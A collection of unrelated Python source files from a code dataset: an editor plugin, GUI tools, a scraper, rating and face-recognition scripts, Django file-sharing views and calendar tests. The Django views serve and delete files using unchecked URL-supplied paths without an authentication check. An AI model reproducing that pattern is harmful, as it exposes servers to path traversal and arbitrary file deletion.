errormarkers.show_error_marks(view)\n\n\ndef is_member_completion(view, caret):\n regex = re.compile(r\"(([a-zA-Z_]+[0-9_]*)|([\\)\\]])+)((\\.)|(->))$\")\n line = view.substr(Region(view.line(caret).a, caret))\n lang = get_language(view)\n if regex.search(line) != None:\n return True\n elif lang.is_objective_family():\n return re.search(r\"\\[[\\.\\->\\s\\w\\]]+\\s+$\", line) != None\n return False\n\n\nclass ClangComplete(sublime_plugin.TextCommand):\n def run(self, edit, characters):\n regions = [a for a in self.view.sel()]\n self.view.sel().clear()\n for region in reversed(regions):\n pos = 0\n region.end() + len(characters)\n if region.size() > 0:\n self.view.replace(edit, region, characters)\n pos = region.begin() + len(characters)\n else:\n self.view.insert(edit, region.end(), characters)\n pos = region.end() + len(characters)\n\n self.view.sel().add(sublime.Region(pos, pos))\n caret = self.view.sel()[0].begin()\n line = self.view.substr(sublime.Region(self.view.word(caret-1).a, caret))\n if is_member_completion(self.view, caret) or line.endswith(\"::\") or re.search(\"(^|\\W)new\\s+\\w*$\", line):\n self.view.run_command(\"hide_auto_complete\")\n sublime.set_timeout(self.delayed_complete, 1)\n\n def delayed_complete(self):\n self.view.run_command(\"auto_complete\")\n\n\nclass SublimeClangAutoComplete(sublime_plugin.EventListener):\n def __init__(self):\n plugin_settings = common.get_settings()\n plugin_settings.clear_on_change(\"options\")\n plugin_settings.add_on_change(\"options\", self.clear_cache)\n plugin_settings.add_on_change(\"options\", self.load_settings)\n\n # wtf is this?\n common.are_we_there_yet(lambda: self.load_settings())\n self.compile_timer = None\n self.load_settings()\n self.not_code_regex = re.compile(\"(string.)|(comment.)\")\n\n def clear_cache(self):\n if cache.tuCache is None:\n return\n cache.tuCache.clear()\n\n def load_settings(self):\n self.recompile_delay = common.get_setting(\"recompile_delay\", 0)\n self.cache_on_load = common.get_setting(\"cache_on_load\", True)\n self.not_code_regex = re.compile(\"(string.)|(comment.)\")\n self.remove_on_close = common.get_setting(\"remove_on_close\", True)\n self.recompile_delay = common.get_setting(\"recompile_delay\", 1000)\n self.cache_on_load = common.get_setting(\"cache_on_load\", True)\n self.remove_on_close = common.get_setting(\"remove_on_close\", True)\n self.reparse_on_save = common.get_setting(\"reparse_on_save\", True)\n self.reparse_on_focus = common.get_setting(\"reparse_on_focus\", True)\n self.reparse_on_edit = common.get_setting(\"reparse_on_edit\", False)\n\n self.dont_complete_startswith = ['operator', '~']\n\n\n def is_enabled(self, view):\n if common.get_setting(\"enabled\", True, view) == False:\n return False\n elif clang_complete_enabled == False:\n return False\n\n return True\n\n def is_member_kind(self, kind):\n return kind == cindex.CursorKind.CXX_METHOD or \\\n kind == cindex.CursorKind.FIELD_DECL or \\\n kind == cindex.CursorKind.OBJC_PROPERTY_DECL or \\\n kind == cindex.CursorKind.OBJC_CLASS_METHOD_DECL or \\\n kind == cindex.CursorKind.OBJC_INSTANCE_METHOD_DECL or \\\n kind == cindex.CursorKind.OBJC_IVAR_DECL or \\\n kind == cindex.CursorKind.FUNCTION_TEMPLATE or \\\n kind == cindex.CursorKind.NOT_IMPLEMENTED\n\n def return_completions(self, comp, view):\n if common.get_setting(\"inhibit_sublime_completions\", True, view):\n return (comp, sublime.INHIBIT_WORD_COMPLETIONS | sublime.INHIBIT_EXPLICIT_COMPLETIONS)\n return comp\n\n def on_query_completions(self, view, prefix, locations):\n if self.is_enabled(view) == False:\n return self.return_completions([], view)\n if clang_complete_enabled == False:\n return self.return_completions([], view)\n language = get_language(view)\n if language.is_supported == False:\n return self.return_completions([], view)\n\n # what's this??\n if not view.match_selector(locations[0], '-string -comment -constant'):\n return self.return_completions([], view)\n\n line = view.substr(sublime.Region(view.line(locations[0]).begin(), locations[0]))\n match = re.search(r\"[,\\s]*(\\w+)\\s+\\w+$\", line)\n if match != None:\n valid = [\"new\", \"delete\", \"return\", \"goto\", \"case\", \"const\", \"static\", \"class\", \"struct\", \"typedef\", \"union\"]\n if match.group(1) not in valid:\n # Probably a variable or function declaration\n # There's no point in trying to complete\n # a name that hasn't been typed yet...\n return self.return_completions([], view)\n\n filename = get_filename(view)\n\n tu = get_translation_unit(view, filename, language)\n assert tu is not None\n\n data = view.substr(sublime.Region(0, locations[0]))\n\n results = None\n results = tu.complete(data, prefix)\n\n if results == None:\n row, col = view.rowcol(locations[0] - len(prefix))\n unsaved_files = []\n # todo fix this\n #if view.is_dirty():\n # unsaved_files.append((sencode(view.file_name()),\n # view.substr(Region(0, view.size()))))\n # results = tu.cache.clangcomplete(sencode(view.file_name()), row+1, col+1, unsaved_files, is_member_completion(view, locations[0] - len(prefix)))\n\n if len(self.dont_complete_startswith) and results:\n i = 0\n while i < len(results):\n disp = results[i][0]\n pop = False\n for comp in self.dont_complete_startswith:\n if disp.startswith(comp):\n pop = True\n break\n\n if pop:\n results.pop(i)\n else:\n i += 1\n\n if not results is None:\n return self.return_completions(results, view)\n return self.return_completions([], view)\n\n def reparse_done(self):\n display_compilation_results(self.view)\n\n def start_recompile_timer(self, timeout):\n if self.compile_timer != None:\n self.compile_timer.cancel()\n self.compile_timer = None\n\n # schedule recompile\n self.compile_timer = threading.Timer(timeout, sublime.set_timeout,\n [self.recompile, 0])\n self.compile_timer.start()\n\n\n def recompile(self):\n view = self.view\n unsaved_files = []\n # todo: fix this\n #if view.is_dirty() and common.get_setting(\"reparse_use_dirty_buffer\", False, view):\n # unsaved_files.append((sencode(view.file_name()),\n # view.substr(Region(0, view.size()))))\n\n filename = get_filename(view)\n language = get_language(view)\n\n cache = get_cache()\n opts = collect_all_options(view, filename, language)\n\n if cache.reparse(filename, opts, unsaved_files, self.reparse_done) == False:\n self.start_recompile_timer(1) # Already parsing so retry in a bit\n\n def on_activated(self, view):\n if self.is_enabled(view) == False:\n return\n\n if self.reparse_on_focus == False:\n return\n lang = get_language(view)\n if lang.is_supported() == False:\n return\n\n self.view = view\n self.start_recompile_timer(0.1)\n\n def on_post_save(self, view):\n if self.is_enabled(view) == False:\n return\n\n if self.reparse_on_save == False:\n return\n lang = get_language(view)\n if lang.is_supported() == False:\n return\n\n #print(\"on_post_save\")\n\n\n self.view = view\n self.start_recompile_timer(0.1)\n\n def on_modified(self, view):\n if self.is_enabled(view) == False:\n return\n\n if self.reparse_on_edit == False:\n return\n\n lang = get_language(view)\n if lang.is_supported() == False:\n return\n\n #print(\"on_modified\")\n\n self.view = view\n self.start_recompile_timer(1.0)\n\n def on_load(self, view):\n if self.is_enabled(view) == False:\n return\n\n if self.cache_on_load == False:\n return\n lang = get_language(view)\n if lang.is_supported() == False:\n return\n\n source = get_filename(view)\n\n warm_up_cache(view, source, lang)\n\n def on_close(self, view):\n if self.remove_on_close == False:\n return\n lang = get_language(view)\n if lang.is_supported() == False:\n return\n\n if cache.tuCache != None:\n filename = get_filename(view)\n cache.tuCache.remove(filename)\n\n def on_query_context(self, view, key, operator, operand, match_all):\n if key == \"clang_supported_language\":\n if view == None:\n view = sublime.active_window().active_view()\n lang = get_language(view)\n return lang.is_supported()\n elif key == \"clang_is_code\":\n return self.not_code_regex.search(view.scope_name(view.sel()[0].begin())) == None\n elif key == \"clang_complete_enabled\":\n return clang_complete_enabled\n elif key == \"clang_automatic_completion_popup\":\n return True\n elif key == \"clang_panel_visible\":\n return errormarkers.clang_error_panel.is_visible()\n","sub_path":"clang-complete.py","file_name":"clang-complete.py","file_ext":"py","file_size_in_byte":26813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"331724200","text":"import time\nimport json\nfrom PyQt5.Qt import *\nfrom resource.report2 import Ui_Form\nfrom gen_report.make_report import make_reports\n\n\nclass ReportGui(QWidget, Ui_Form):\n # send_signal = pyqtSignal(float, float, str, str)\n\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.setWindowTitle('生成报表工具')\n self.resize(500, 344)\n self.center()\n current_time = time.time()\n str_time = time.strftime('%Y-%m-%d', time.localtime(current_time - 3600 * 24))\n ed_time = time.strftime('%Y-%m-%d', time.localtime(current_time))\n self.st_time = str_time + ' 08:00:00'\n self.ed_time = ed_time + ' 08:00:00'\n self.st_le.setText(self.st_time)\n self.ed_le.setText(self.ed_time)\n self.le_regular()\n\n def center(self):\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n def le_regular(self):\n reg_exp = QRegExp(\n '^\\d{4}-(0?[1-9]|1[0-2])-(([012])?\\d|3[01]) (([01])?\\d|2[0-3]):[0-5]\\d:[0-5]\\d$'\n )\n time_limit = QRegExpValidator(reg_exp)\n self.st_le.setValidator(time_limit)\n self.ed_le.setValidator(time_limit)\n\n def gen_csv(self):\n st_time_str = self.st_le.text()\n ed_time_str = self.ed_le.text()\n\n st = 0\n ed = 0\n if st_time_str:\n try:\n st = time.mktime(time.strptime(st_time_str, '%Y-%m-%d %H:%M:%S'))\n except:\n self.tips('时间输入有误')\n self.st_le.setText(self.st_time)\n return\n if ed_time_str:\n try:\n ed = time.mktime(time.strptime(ed_time_str, '%Y-%m-%d %H:%M:%S'))\n except:\n self.tips('时间输入有误')\n self.ed_le.setText(self.ed_time)\n return\n if all([st, ed]) and st >= ed:\n self.tips('时间输入有误')\n return\n self.gen_btn.setEnabled(False)\n self.gen_btn.setText('GENERATING')\n thread = TSend(st, ed, st_time_str, ed_time_str)\n thread.signal.connect(self.tips)\n thread.start()\n thread.exec()\n # thread.wait()\n\n def tips(self, info: str):\n QMessageBox.information(self, '', info, QMessageBox.Ok)\n self.gen_btn.setEnabled(True)\n self.gen_btn.setText('GENERATE')\n\n\nclass TSend(QThread):\n signal = pyqtSignal(str)\n\n def __init__(self, st, ed, st_time_str, ed_time_str):\n super().__init__()\n self.st = st\n self.ed = ed\n self.st_time_str = st_time_str\n self.ed_time_str = ed_time_str\n\n def run(self):\n with open('config.json') as f:\n config = json.load(f)\n url = config.get('url')\n if not url:\n self.signal.emit('配置url出错')\n if make_reports(url, self.st, self.ed, self.st_time_str, self.ed_time_str):\n self.signal.emit('生成成功')\n else:\n self.signal.emit('生成失败')\n\n\nif __name__ == '__main__':\n import sys\n\n app = QApplication(sys.argv)\n window = ReportGui()\n window.show()\n sys.exit(app.exec_())\n","sub_path":"report_gui.py","file_name":"report_gui.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"385379920","text":"wantedcpu=input(\"CPU\")\nwantedgpu=input(\"GPU\")\nwantedstoragedevicetype=input(\"StorageDevice\")\nwantedram=int(input(\"RAM\"))\nwantedcomputer=int(input(\"How many computer do you want to buy?\"))\ndef init():\n wantedcpu=input(\"CPU\")\n wantedgpu=input(\"GPU\")\n wantedstoragedevicetype=input(\"StorageDevice\")\n wantedram=int(input(\"RAM\"))\n wantedcomputer=int(input(\"How many computer do you want to buy?\"))\nintel=0\namd=0\nprice1=0\nprice2=0\nprice3=0\nprice4=0\noverallsum=0\nbulksum=0\ndef cpu(wantedcpu):\n global price1\n if wantedcpu==\"INTEL\":\n price1=320\n elif wantedcpu==\"AMD\":\n price1=300\n else:\n price1=290\n return price1\ndef gpu(wantedgpu):\n global price2\n if wantedgpu==\"INTEL\":\n price2=100\n elif wantedgpu==\"NVIDIA\":\n price2=150\n else:\n price2=145\n return price2\ndef storagedevice(wantedstoragedevicetype):\n global price3\n if wantedstoragedevicetype==\"HDD\":\n price3=200\n elif wantedstoragedevicetype==\"SSD\":\n price3=300\n else:\n print(\"Please check your answer\")\n return price3\ndef ram (wantedram):\n global price4\n for i in range (0,wantedram):\n price4+=25\n return price4\ndef sumintel ():\n global overallsum\n overallsum = price1 + (price2*0.95) + price3 + price4\n return overallsum\ndef sumamd():\n global overallsum\n overallsum = price1 + (price2*0.90) + price3 + price4\n return overallsum\ndef sum():\n global overallsum\n overallsum = price1 + price2 + price3 + price4\n return overallsum\n\nfor i in range(0,2**63):\n cpu(wantedcpu)\n gpu(wantedgpu)\n storagedevice\ncpu(wantedcpu)\ngpu(wantedgpu)\nstoragedevice(wantedstoragedevicetype)\nram(wantedram)\nif wantedcpu == \"INTEL\" and wantedgpu==\"INTEL\":\n sumintel()\nelif wantedcpu == \"AMD\" and wantedgpu==\"ATI\":\n sumamd()\nelse:\n sum()\nif wantedcomputer>1:\n for i in range (0,wantedcomputer):\n bulksum+=overallsum\n print(bulksum)\nelif wantedcomputer==1:\n print(overallsum)\n\nif overallsum > 800 or bulksum >800:\n print(\"Congrulations!\\n You won free antivirus for more than 800$$ \")\nif wantedcomputer or wantedcpu or wantedgpu or wantedram or wantedstoragedevicetype == \"QUIT\":\n exit()\n\n\n\n","sub_path":"fatihodev2.py","file_name":"fatihodev2.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"651718608","text":"import requests;\nimport re;\nfrom Sgf import Sgf;\nfrom DBHelper import DBHelper;\nimport xlrd\nimport random\n\ndef genSgfToDB():\n list = []\n # list7k = fetchUrlList(\"https://www.101weiqi.com/7K/?page=\", 2000)\n # list.extend(list7k)\n list6k = fetchUrlList(\"https://www.101weiqi.com/2D/?page=\", 2000)\n list.extend(list6k)\n print(len(list))\n\n # for i in range(61, 65):\n # toDB(list, i, 5);\n\n toDB(list, 65, 5);\n\n\ndef fetchUrlList(listUrl, limit):\n list = []\n page = 1\n while len(list) <= limit:\n resp = requests.get(listUrl + str(page))\n if resp.status_code != 200:\n print(\"Error: status_code=\" + resp.status_code)\n\n pat = re.compile(r\"
    \", re.DOTALL)\n findList = pat.findall(resp.text)\n print(len(findList))\n list.extend(findList)\n page += 1\n\n print(\"finish:\" + listUrl)\n return list\n\n\ndef toDB(list, level, limit):\n successCount = 0\n for i in range(0, len(list)):\n item = list.pop(random.randint(0, len(list)-1))\n url = 'https://www.101weiqi.com' + item[0]\n sgf = fillSgf(url, None, level)\n\n if sgf.sgf_text == None:\n print(\"Gen Error:\" + sgf.url)\n continue\n else:\n successCount += 1;\n print(\"success \" + str(successCount))\n DBHelper().save(sgf)\n\n if successCount >= limit:\n break\n\n print(\"--------------\" + str(i) + '\\n\\n')\n\ndef genSgfExcelToDB(filename):\n data = xlrd.open_workbook(filename)\n table = data.sheets()[0]\n for rownum in iter(range(table.nrows)):\n if rownum == 0:\n continue\n lineItem = table.row_values(rownum);\n url = lineItem[0];\n level = lineItem[1];\n if url == None or len(url) == 0:\n continue\n print(lineItem)\n\n sgf = fillSgf(url, level)\n if sgf.sgf_text == None:\n return None\n DBHelper().save(sgf);\n\ndef fillSgf(url, thumbnail, level):\n sgf = Sgf()\n sgf.url = url\n if thumbnail == None:\n sgf.thumbnails = getThumbnails(sgf.url)\n else:\n sgf.thumbnails = thumbnail\n sgf.html_info = fetchItem(sgf.url)\n sgf.sgf_text = sgf.genSgfText()\n sgf.go_level = level\n sgf.level_id = level\n print(sgf.url)\n return sgf\n\ndef getThumbnails(url):\n print('getThumbnails=' + url)\n searchObj = re.search(r\"https?://www.101weiqi.com/.+?/(\\d+?)/\", url, re.M);\n id = searchObj.group(1);\n if id == None:\n return \"\";\n return \"/file/newimg/\" + id + \".png\"\n\n\ndef fetchItem(url):\n resp = requests.get(url);\n if resp.status_code != 200:\n print(\"Error: status_code=\" + resp.status_code);\n\n searchObj = re.search(r'var g_qq\\s*=\\s*(.*);var taskinfo', resp.text, re.M);\n jsonText = searchObj.group(1);\n# print(jsonText);\n return jsonText;\n\n\n\n# genSgfExcel2DB(\"/Users/liuming/_work/flutter/res/excel/sgf_30_level_1.xlsx\");\n\n\ngenSgfToDB();\n","sub_path":"flutter_script/com/aiqiyi/go/script/101Spider.py","file_name":"101Spider.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"391709114","text":"# https://leetcode-cn.com/problems/palindrome-partitioning/\r\n\r\n\r\nclass Solution:\r\n def partition(self, s):\r\n split_result = []\r\n if len(s) == 0:\r\n return split_result\r\n\r\n def back(start=0, res=[]):\r\n if start >= len(s):\r\n split_result.append(res)\r\n return\r\n for end in range(start + 1, len(s) + 1):\r\n split_s = s[start:end]\r\n # 如果当前子串为回文串,则可以继续递归\r\n if split_s == s[start:end][::-1]:\r\n back(end, res + [split_s])\r\n\r\n back()\r\n return split_result\r\n\r\n\r\ns = 'aab'\r\nprint(Solution().partition(s))\r\n","sub_path":"131-2-Palindrome Partitioning-递归.py","file_name":"131-2-Palindrome Partitioning-递归.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"126637455","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport os\nimport sys\nfrom setuptools import setup, find_packages\nimport warnings\n\nmsg = \"\"\"\nCould not detect PyQt4. Install PyQt4 system wide. If you are in\na virtualenv install the vext.pyqt4 package: \n\n $ pip install astro-tigger[venv]\n\n\"\"\"\n\ntry:\n import PyQt4\nexcept ImportError:\n warnings.warn(msg)\n\n\n__version__ = \"1.4.0\"\n\nrequirements = ['astro_kittens', 'numpy', 'scipy', 'astlib', 'pyfits', 'astro_tigger_lsm' ]\n\nscripts = [\n 'TigGUI/tigger',\n]\n\npackage_data = {'TigGUI': [\n 'icons/*.png',\n 'tigger.conf',\n] }\n\nextras_require = {\n 'venv': ['vext.pyqt4'],\n}\n\n\nsetup(\n name =\"astro-tigger\",\n version=__version__,\n packages=find_packages(),\n extras_require=extras_require,\n scripts=scripts,\n package_data=package_data,\n description=\"yet another FITS image viewer\",\n author=\"Oleg Smirnov\",\n author_email=\"osmirnov@gmail.com\",\n url=\"https://github.com/ska-sa/tigger\",\n install_requires=requirements,\n)\n\n","sub_path":"pypi_install_script/astro-tigger-1.4.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"436306135","text":"#!/usr/bin/env python3\n\nimport itertools\nimport math\nimport collections\nimport os\n\nimport trueskill\n\nfrom elo import doubles\n\nPlayerStats = collections.namedtuple('PlayerStats', ['rating', 'games_played', 'games_won'])\n\n\ndef pretty_unranked_players(players):\n for player, stats in sorted(players):\n yield \"%s (%s)\" % (player, stats.games_played)\n\n\ndef new_player_stats():\n return PlayerStats(trueskill.Rating(), 0, 0)\n\n\ndef win_probability(team1, team2):\n delta_mu = sum(r.mu for r in team1) - sum(r.mu for r in team2)\n sum_sigma = sum(r.sigma ** 2 for r in itertools.chain(team1, team2))\n size = len(team1) + len(team2)\n denom = math.sqrt(size * (trueskill.BETA * trueskill.BETA) + sum_sigma)\n ts = trueskill.global_env()\n return ts.cdf(delta_mu / denom)\n\n\ndef pretty_rating(rating):\n return \"%2.1f\" % rating.mu\n\n\ndef debug_rating(rating):\n return (\"%2.1f ± %2.1f\" % (rating.mu, rating.sigma))\n\n\nif __name__ == '__main__':\n players = {}\n for game in doubles:\n team1_player1_name = game[0]\n team1_player1_stats = players.get(team1_player1_name, new_player_stats())\n team1_player2_name = game[1]\n team1_player2_stats = players.get(team1_player2_name, new_player_stats())\n team1_rating = [team1_player1_stats.rating, team1_player2_stats.rating]\n team1_score = game[2]\n\n team2_player1_name = game[3]\n team2_player1_stats = players.get(team2_player1_name, new_player_stats())\n team2_player2_name = game[4]\n team2_player2_stats = players.get(team2_player2_name, new_player_stats())\n team2_rating = [team2_player1_stats.rating, team2_player2_stats.rating]\n team2_score = game[5]\n\n # print(\"Processing game with %s and %s vs %s and %s\" % (team1_player1_name, team1_player2_name, team2_player1_name, team2_player2_name))\n\n team1_won = team1_score > team2_score\n team2_won = not team1_won\n # print(\"Team %s won\" % (\"1\" if team1_won else \"2\"))\n\n # For trueskill, lower score is better\n team2_score_normalised = team1_score / (team1_score + team2_score)\n team1_score_normalised = 1 - team2_score_normalised\n\n new_team1_rating, new_team2_rating = trueskill.rate(\n [team1_rating, team2_rating],\n ranks=[team1_score_normalised, team2_score_normalised])\n\n new_team1_player1_stats = PlayerStats(new_team1_rating[0], team1_player1_stats.games_played + 1, team1_player1_stats.games_won + (1 if team1_won else 0))\n new_team1_player2_stats = PlayerStats(new_team1_rating[1], team1_player2_stats.games_played + 1, team1_player2_stats.games_won + (1 if team1_won else 0))\n players[team1_player1_name] = new_team1_player1_stats\n players[team1_player2_name] = new_team1_player2_stats\n\n new_team2_player1_stats = PlayerStats(new_team2_rating[0], team2_player1_stats.games_played + 1, team2_player1_stats.games_won + (1 if team2_won else 0))\n new_team2_player2_stats = PlayerStats(new_team2_rating[1], team2_player2_stats.games_played + 1, team2_player2_stats.games_won + (1 if team2_won else 0))\n players[team2_player1_name] = new_team2_player1_stats\n players[team2_player2_name] = new_team2_player2_stats\n\n if 'FOOS_DEBUG' in os.environ:\n print(\"\"\"Game:\n Team1 ({t1score}):\n {t1p1n} ({t1p1ro} => {t1p1rn})\n {t1p2n} ({t1p2ro} => {t1p2rn})\n Team2 ({t2score}):\n {t2p1n} ({t2p1ro} => {t2p1rn})\n {t2p2n} ({t2p2ro} => {t2p2rn})\"\"\".format(\n t1p1n = team1_player1_name,\n t1p2n = team1_player2_name,\n t2p1n = team2_player1_name,\n t2p2n = team2_player2_name,\n t1p1ro = debug_rating(team1_player1_stats.rating),\n t1p2ro = debug_rating(team1_player2_stats.rating),\n t2p1ro = debug_rating(team2_player1_stats.rating),\n t2p2ro = debug_rating(team2_player2_stats.rating),\n t1p1rn = debug_rating(new_team1_player1_stats.rating),\n t1p2rn = debug_rating(new_team1_player2_stats.rating),\n t2p1rn = debug_rating(new_team2_player1_stats.rating),\n t2p2rn = debug_rating(new_team2_player2_stats.rating),\n t1score = team1_score,\n t2score = team2_score,\n ))\n\n ljust_amt = max(map(lambda name: len(name), players.keys())) + 1\n nplayers = len(players.keys())\n i = 1\n unranked = []\n for player, stats in sorted(players.items(),\n key=lambda p: p[1].rating.mu, reverse=True):\n if stats.rating.sigma > 5 or stats.games_played < 15:\n unranked.append((player, stats))\n continue\n print(\"{rank}: {name}: {rating}\".format(\n rank=str(i).rjust(2),\n name=player.ljust(ljust_amt),\n rating=pretty_rating(stats.rating)\n ))\n i += 1\n print(\"Unranked players (play 15+ games!): %s\" % \", \".join(pretty_unranked_players(unranked)))\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"625296010","text":"import os\nimport numpy as np \nimport cv2 as cv \nimport sys\n\n\nfile = sys.argv[1]\nprint(file)\n\nhaar_cascade = cv.CascadeClassifier('data/haar_face.xml')\n#features = np.load('features.npy')\n#labels = np.load('labels.npy')\n\n\nface_recognizer = cv.face.LBPHFaceRecognizer_create()\nface_recognizer.read('face_trained.yml')\n\ndir = 'photos/faces'\npeople = []\nfor f in os.listdir(dir):\n people.append(f)\n\nimg = cv.imread(file)\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\ncv.imshow(\"person\", gray)\n\nfaces_rect = haar_cascade.detectMultiScale(gray, 1.1 ,4)\n\n\nfor (x,y,w,h) in faces_rect:\n faces_roi = gray[y:y+h, x:x+w]\n\n label, confidence = face_recognizer.predict(faces_roi)\n print(f'Label = {people[label]} with confidence of {confidence}')\n cv.putText(img, str(people[label]), (20,20), cv.FONT_HERSHEY_COMPLEX, 1.0, (0,255.0), thickness=2)\n cv.rectangle(img, (x,y), (x+w, y+h), (0, 255, 0), thickness=2)\n\n\ncv.imshow(\"detected \", img)\ncv.waitKey(0)","sub_path":"face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"15410984","text":"from matplotlib import pyplot as plt\nimport pylab as mpl\nmpl.rcParams['font.sans-serif'] = ['FangSong'] # 指定默认字体\nmpl.rcParams['axes.unicode_minus'] = False\na = [\"猩球崛起3:终极之战\",\"敦刻尔克\",\"蜘蛛侠:英雄归来\",\"战狼2\"]\nb_16 = [15746,312,4497,319]\nb_15 = [12357,156,2045,168]\nb_14 = [2358,399,2358,362]\nbar_width = 0.3\nx_14 = list(range(len(a)))\nx_15 = list(i+bar_width for i in x_14)\nx_16 = list(i+bar_width*2 for i in x_14)\nplt.figure(figsize=(20,8),dpi=80)\nplt.bar(range(len(a)),b_14,width=bar_width,label=\"14号\")\nplt.bar(x_15,b_15,width=bar_width,label=\"15号\")\nplt.bar(x_16,b_16,width=bar_width,label=\"16号\")\nplt.legend()\n#设置x轴刻度\nplt.xticks(x_15,a)\nplt.show()\n","sub_path":"page_43.py","file_name":"page_43.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"325408571","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse\r\nfrom django import forms\r\nfrom viewfolder.models import Folder\r\nimport os\r\n\r\n# Create your views here.\r\ndef personalfolder(request,username):\r\n if request.session.get(username,\"none\")==username:\r\n html = \"viewfolder/personalfolder.html\";\r\n return folder_operation(request,username,username,html);\r\n else:\r\n return HttpResponse(\"Please login first\");\r\n\r\nclass Upload(forms.Form):\r\n filepath = forms.FileField();\r\n description = forms.CharField();\r\n\r\ndef publicfolder(request,username):\r\n if request.session.get(username,\"none\")==username:\r\n html = \"viewfolder/publicfolder.html\";\r\n return folder_operation(request,\"public\",username,html);\r\n else:\r\n return HttpResponse(\"Please login first\");\r\n\r\ndef readfile(path,buf_size=262144):\r\n with open(path,\"rb\") as fd:\r\n while True:\r\n c = fd.read(buf_size);\r\n if c:\r\n yield c;\r\n else:\r\n break;\r\n\r\ndef getfile(request,username, filename):\r\n path = \"./folder/\"+username+\"/\"+filename\r\n response = HttpResponse(readfile(path))\r\n response['Content-Type'] = 'application/octet-stream'\r\n response['Content-Disposition'] = 'attachment;filename=\"{0}\"'.format(path);\r\n return response;\r\n\r\ndef deletefile(request,username,filename):\r\n path = \"./folder/\"+username+\"/\"+filename\r\n Folder.objects.filter(username=username,filepath=filename).delete();\r\n os.remove(path);\r\n return HttpResponse(\"File \"+filename+\" is deleted successfully\");\r\n\r\ndef folder_operation(request,username,uploadname,html):\r\n if request.method==\"POST\":\r\n\r\n filename = request.POST.get(\"description\");\r\n filepath = request.FILES[\"filepath\"];\r\n\r\n if Folder.objects.filter(username=username,filepath=filepath).count():\r\n return HttpResponse(\"File \"+filepath.name+\" already exits\");\r\n\r\n upload = Folder();\r\n upload.filename = filename;\r\n upload.filepath = filepath.name;\r\n upload.username = username;\r\n\r\n upload.save();\r\n\r\n SavePath = \"./folder/\"+username+\"/\"+filepath.name;\r\n with open(SavePath,\"wb\") as fw:\r\n for chunk in filepath.chunks():\r\n fw.write(chunk);\r\n\r\n return HttpResponse(\"Upload successfully!\");\r\n \r\n else:\r\n upload = Upload();\r\n files = Folder.objects.filter(username=username);\r\n path = \"/folder/\"+username+\"/\"\r\n # form files as a filder\r\n File = [];\r\n for i in range(len(files)):\r\n filetmp = [];\r\n filetmp.append(str(files[i].username));\r\n filetmp.append(str(files[i].filepath));\r\n filetmp.append(str(files[i].filename));\r\n File.append(filetmp);\r\n return render(request,html,{\"username\":uploadname,'upload':upload,\"files\":File,\"path\":path})\r\n","sub_path":"siig_repos/viewfolder/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"111755987","text":"import unittest\nfrom icalevents import icalevents\nfrom datetime import date, timedelta, datetime\nfrom time import sleep\nfrom dateutil.relativedelta import relativedelta\nfrom dateutil.tz import UTC\nfrom re import search\n\n\nclass ICalEventsTests(unittest.TestCase):\n def test_events_url(self):\n url = \"https://raw.githubusercontent.com/irgangla/icalevents/master/test/test_data/basic.ics\"\n start = date(2017, 5, 18)\n end = date(2017, 5, 19)\n\n evs = icalevents.events(url=url, file=None, start=start, end=end)\n\n self.assertEqual(len(evs), 2, \"two events are found\")\n\n def test_events_start(self):\n ical = \"test/test_data/basic.ics\"\n start = date(2017, 5, 16)\n\n evs = icalevents.events(url=None, file=ical, start=start)\n\n self.assertEqual(len(evs), 3, \"three events are found\")\n\n def test_events(self):\n ical = \"test/test_data/basic.ics\"\n start = date(2017, 5, 18)\n end = date(2017, 5, 19)\n\n evs = icalevents.events(url=None, file=ical, start=start, end=end)\n\n self.assertEqual(len(evs), 2, \"two events are found\")\n\n def test_events_duration(self):\n ical = \"test/test_data/duration.ics\"\n start = date(2018, 1, 1)\n end = date(2018, 2, 1)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n e1 = evs[0]\n self.assertEqual(e1.start.day, 10, \"explicit event start\")\n self.assertEqual(e1.end.day, 13, \"implicit event end\")\n\n e2 = evs[1]\n self.assertEqual(e2.start.hour, 10, \"explicit event start\")\n self.assertEqual(e2.end.hour, 13, \"implicit event end\")\n\n e3 = evs[2]\n self.assertEqual(e3.start.hour, 12, \"explicit event start\")\n self.assertEqual(e3.end.hour, 12, \"implicit event end\")\n\n def test_events_recurring(self):\n ical = \"test/test_data/recurring.ics\"\n start = date(2018, 10, 15)\n end = date(2018, 11, 15)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n e1 = evs[1]\n self.assertEqual(e1.start.hour, 10, \"check time with DST\")\n self.assertEqual(e1.start.tzinfo.utcoffset(e1.start), timedelta(seconds=7200), \"check UTC offset with DST\")\n\n e2 = evs[2]\n self.assertEqual(e2.start.hour, 10, \"check time without DST\")\n self.assertEqual(e2.start.tzinfo.utcoffset(e2.start), timedelta(seconds=3600), 